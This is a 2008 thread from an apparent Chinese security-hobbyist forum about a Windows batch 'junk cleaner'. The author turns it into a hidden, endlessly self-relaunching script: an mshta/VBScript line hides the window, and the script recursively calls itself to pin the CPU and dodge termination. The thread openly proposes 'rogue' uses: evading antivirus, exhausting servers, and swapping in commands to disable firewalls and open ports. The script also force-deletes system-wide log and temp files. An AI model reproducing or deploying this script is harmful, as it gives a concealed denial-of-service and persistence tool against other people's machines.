标题:
【原创】再谈垃圾清除的批处理和其流氓运用!
[打印本页]
作者:
平湖秋月
时间:
2008-9-13 23:51
标题:
【原创】再谈垃圾清除的批处理和其流氓运用!
大家经常会看到这个垃圾清除的的BAT程序,也就是很多人所说的30秒清除所有的系统他及程序 说实话这个批处理效果确实不错 ,速度快而且不重不漏!系统这下减了不少肥。不过我觉得这个BAT还是有点不很完善,要是能够自动检测系统中的垃圾文件并且删除那该多好啊!
2 N' o0 u8 V4 D/ c: U
a.bat源代码如下:
! l* T& x* Q" r8 K! F# Q( N
% k0 J* L7 d4 x( K
* I) @/ R. G/ w2 N0 D2 c
===可以直接保存改名a.bat=====================
' R0 m. w6 ~ d: T) F
@echo off
2 r* s* `4 w2 ~
echo 正在清除系统垃圾文件,请稍等......
8 o7 x$ |' s5 E1 @- g
@del /f /s /q %systemdrive%\*.tmp
% k$ N. [+ k" ]+ W
@del /f /s /q %systemdrive%\*._mp
/ h- m7 e* G8 G0 e3 f% u
@del /f /s /q %systemdrive%\*.log
H y' k$ N8 x; x I
@del /f /s /q %systemdrive%\*.gid
- f* v& U# H, T' r1 |
@del /f /s /q %systemdrive%\*.chk
3 ]. k4 f. h' B! t9 Z
@del /f /s /q %systemdrive%\*.old
) i( {$ d+ x* D! l8 g" O
@del /f /s /q %systemdrive%\recycled\*.*
* x- F/ k& l; d- |8 h1 }8 K! ^
@del /f /s /q %windir%\*.bak
0 F I# E, f9 j3 ^2 @
@del /f /s /q %windir%\prefetch\*.*
3 U+ ^2 K9 n% G2 H9 \
@rd /s /q %windir%\temp & md %windir%\temp
/ r7 S9 M( _0 j% x# I8 c, N4 |
@del /f /q %userprofile%\cookies\*.*
8 P3 ?$ n# r- }' {2 |
@del /f /q %userprofile%\recent\*.*
6 I' Z) C- E9 j& s J- }
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
/ n% z: b% J) S! E, [0 c4 J; n
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
5 ]8 @) F. ]) _, \9 L0 S' i& s
@del /f /s /q "%userprofile%\recent\*.*"
% z' V7 W2 W" R& H# s, s( h5 q
echo 清除系统LJ完成!
4 z3 i2 ~8 R7 f& A$ C- K* z; p
其实简单的一句话便实现了那个功能,在“echo 清除系统LJ完成!”后面加上一句 “call a.bat”就OK了,命令的意思大家都懂,我就不做解释了!我运行了一下,到是能够自动检测和删除了,而且关掉对话框也简单,直接关闭就行了!但是如果 被当作入侵工具却又点太暴露,并且那个DOS框始终不能隐藏,很容易被发现.这该怎么办?想想批处理里面的命令,貌似没见到有隐藏对话框的用法(如果有请告诉指教一下!我的QQ:118122875),于是到网上找了一下,决定用VBS代码实现,于是又加上了下面的代码,其实也很简单,也就加了一句话进去:
# [) h; Y0 h% r2 O
1 b+ ]( F5 b( ^/ I+ K
===可以直接保存改名为a.bat
(一定要是a.bat哦具体说明原因你应该明白吧======
/ K3 o" O; H, L) v- }) |8 L6 L
@echo off
7 G( X$ r3 o) f/ V! l9 P/ c/ Q- |
if "%1" == "h" goto begin
- V, Q8 r8 Z0 O; ?* y1 X* v7 S$ ~2 H
mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit
4 w* z, C& x2 r
:begin
2 ~: V$ b! R% r
echo 正在清除系统垃圾文件,请稍等......
& m2 C& c+ b6 P! Q- h
@@del /f /s /q %systemdrive%\*.tmp
! t Z5 o/ y+ R1 b7 ^" U9 }
@del /f /s /q %systemdrive%\*._mp
, Q$ v8 P7 L9 l3 V
@del /f /s /q %systemdrive%\*.log
( t4 K+ p4 [% O; p* |
@del /f /s /q %systemdrive%\*.gid
9 G9 |1 N0 d* B) S
@del /f /s /q %systemdrive%\*.chk
, p# A' ]" O" A$ x7 ?% ~
@del /f /s /q %systemdrive%\*.old
% L- g: D e6 t5 i
@del /f /s /q %systemdrive%\recycled\*.*
( s8 l% w% t/ N( e( C/ m9 D; U
@del /f /s /q %windir%\*.bak
6 i5 j8 `0 L( v+ R/ a! C, {
@del /f /s /q %windir%\prefetch\*.*
3 U: E/ U* b/ f% t- O5 w; d% a7 T
@rd /s /q %windir%\temp & md %windir%\temp
. `7 B: }5 W2 i1 F3 ~
@del /f /q %userprofile%\cookies\*.*
; w3 e; Q- v$ E/ |0 s. _% Q
@del /f /q %userprofile%\recent\*.*
1 }% |3 }' ^/ E& u8 K% q
@del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
" W; T" ~0 H) h0 D
@del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
8 f3 H3 \6 d+ C: o6 n7 b* R
@del /f /s /q "%userprofile%\recent\*.*"
t* A; Y' ]- C: n% I& j
echo 清除系统LJ完成!
: A- C% c/ K* `( d
call a.bat
, [" p% Z% s# l. n i
运行看看!什么效果?
4 Q j. n) o/ m' E# X
对话框消失了!打开任务管理器查看显示CPU运用:100% 看进程里面cmd.exe占用CPU:99 本来想删除这个进程,但是哪晓得点右键准备去删除那个cmd.exe,没有想到不见了,然后仔细一看,其实cmd.exe没有不见,但是已经PID不一样了,也就表示一个循环已经进行完毕,还没等你来的结束进程就已经进入下一个循环,这时候有的朋友会想可以用taskkill命令来删除进程,但是PID几乎是每2秒换一次,你的速度有那么快?!目前我还没找到解决的办法(高手请指教),无赖只好重新启动...哎!其实这都是雕虫小技,只不过是最基础的东西,但是有的时候最简单的也是最要命的!
8 l0 C: D f7 J. y
, q0 W; L/ D# ]) H3 w! S5 W, D
你说,我们可以利用这个BAT做些什么:
1 [4 ~4 o" J2 g- N, V& _
7 ]- c" h5 m: V& l% A, M
1.因为bat文件可以躲过杀软!这样利用它的无限循环启动一些你自己的程序,当然咯,重复的循环安装时没有必要的,我只是打个比方,你可以自己改动代码达到自己的目的!
+ v6 [: E3 L# v7 r
2.它循环使用消耗资源,如果这样的程序多弄几个,全部启动.你说服务器会怎么样?
1 L: B% j7 E0 M
3.如果我把里面的删除垃圾文件的代码换成关闭防护墙/杀毒和开系统端口和服务的代码,那不是更好?当然这些应用都是我个人的一些分析,没有真正的实验过,我想一个可以成功的通过~不过,这个小东西还有个美中不足,cmd.exe在进程里面看得到,至于怎么隐藏,那就请各位高手指教了,在下刚刚接触批处理,莱鸟一个,有什么不对的地方和我联系啊!我的QQ:118122875 平湖秋月
作者:
上帝的爱
时间:
2008-9-14 05:03
想法非常不错
作者:
柔肠寸断
时间:
2008-9-14 17:34
打个岔,流氓的应用,呵呵
作者:
柔肠寸断
时间:
2008-9-14 17:38
现在来正经的回答下问题:
& S9 L8 G4 k+ G6 M. U- l7 N
1、在bat下隐藏对话框,可以使用一个参数的,但是我记不得了
% O# C) b% f/ U4 a' s0 d- C
c) J: d! p3 L3 G
2、可以将bat转换成exe格式的文件啊,使用bat2exe,下次我找到了就发出来哈
作者:
问道小生
时间:
2008-9-14 19:03
其实这个批处理还有一个问题,就是把log文件一律也作为垃圾处理了~~~
' Y7 [' p. m' o4 x7 u t
部分软件卸载是需要log文件的,删除了它,就会造成软件无法正常卸载,或者卸载不干净。因此,log文件并不是垃圾,不同软件计录的log文件有着不同的作用,有的甚至是非常重要的,不是可以随便删除的,例如:一张CD碟片就有一个log日志文件,它主要记录EAC对CD抓轨的各项参数。
作者:
平湖秋月
时间:
2008-9-15 21:43
楼上的你们说的都有道理 理论上是成立的 我有时间试试看
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/)
Powered by Discuz! 7.2
